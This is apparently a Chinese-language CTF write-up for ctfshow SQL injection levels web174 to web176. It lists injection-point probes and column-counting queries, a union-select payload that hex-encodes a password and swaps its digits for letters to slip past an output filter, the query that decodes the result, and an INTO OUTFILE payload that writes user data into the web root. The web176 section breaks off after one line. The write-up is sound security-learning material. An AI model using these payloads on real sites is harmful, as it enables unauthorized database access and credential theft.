ctfshow-sql注入

SQL注入流程

判断注入点：

or 1=1--+
'or 1=1--+
"or 1=1--+
)or 1=1--+
')or 1=1--+
")or 1=1--+
"))or 1=1--+

判断列数：

1' order by 1 --+
1' order by 2 --+
1' order by 3 --+
......

web174

$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";

1' and 1=1 --+ # 返回正常
1' and 1=2 --+ # 返回错误

1' order by 2 --+ # 返回正常
1' order by 2 --+ # 返回错误

再之后使用union联合注入就无数据返回了，用了盲注也不行，然后我就没有思路了。参考了别的大佬的wp

1' union select 'q',(select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(password),'1','q'),'2','w'),'3','e'),'4','r'),'5','t'),'6','y'),'7','u'),'8','i'),'9','o'),'0','p') from ctfshow_user4 where username='flag')--+

yeuryyueyiyFuuuBereyetyeeyetyyeqwDewyqyyyrwDereryweowDeoyweteywDyqeuyyeieoewyqyqyqytyyyquD

select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace('yeuryyueyiyFuuuBereyetyeeyetyyeqwDewyqyyyrwDereryweowDeoyweteywDyqeuyyeieoewyqyqyqytyyyquD','q','1'),'w','2'),'e','3'),'r','4'),'t','5'),'y','6'),'u','7'),'i','8'),'o','9'),'p','0');

web175-写文件

这个题目的回显有无数据和数据接口请求异常两种，一开始我也很懵逼，看来wp后才知道是有两种解法：盲注和写文件的方式。

1' union select username,password from ctfshow_user5 into outfile '/var/www/html/res.txt'--+

web176-大小写绕过
union select 没反应
![images]https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830104053288-485724949.pngg)